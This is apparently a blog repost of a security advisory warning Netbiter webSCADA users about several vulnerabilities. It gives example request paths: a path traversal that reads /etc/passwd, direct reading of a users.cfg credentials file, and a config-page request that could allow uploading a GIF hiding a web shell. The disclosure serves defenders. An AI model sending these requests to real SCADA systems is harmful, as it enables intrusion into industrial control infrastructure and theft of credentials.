Users of Netbiter webSCADA please be advised of a multiple vulnerabilities that has been identified.
To view this vulnerability, possible remedies, and others please check out the Security Advisories at Critical Watch (http://criticalwatch.com/support/security-advisories.aspx)
Amplify’d from www.criticalwatch.com
STANKOINFORMZASCHITA-10-01: Netbiter webSCADA multiple vulnerabilities
Vulnerability description:
1. Local File Disclosure (WASC Web Application Threat Classification):
/cgi-bin/read.cgi?page=../../../../../../../../../../../etc/passwd%00
2. Users information disclosure:
/cgi-bin/read.cgi?file=/home/config/users.cfg
3. An opportunity of malware code uploading by injection of special crafted GIF-image on the logo page modifying:
/cgi-bin/read.cgi?page=config.html&file=/home/config/pages/2.conf§io
n=PAGE2
In the context of GIF-image can be hidden special malware code («Web-shell»), which will be used for SCADA server management and unauthorized OS commands execution.
Read more at www.criticalwatch.com
See this Amp at http://bit.ly/cExi0j
No comments:
Post a Comment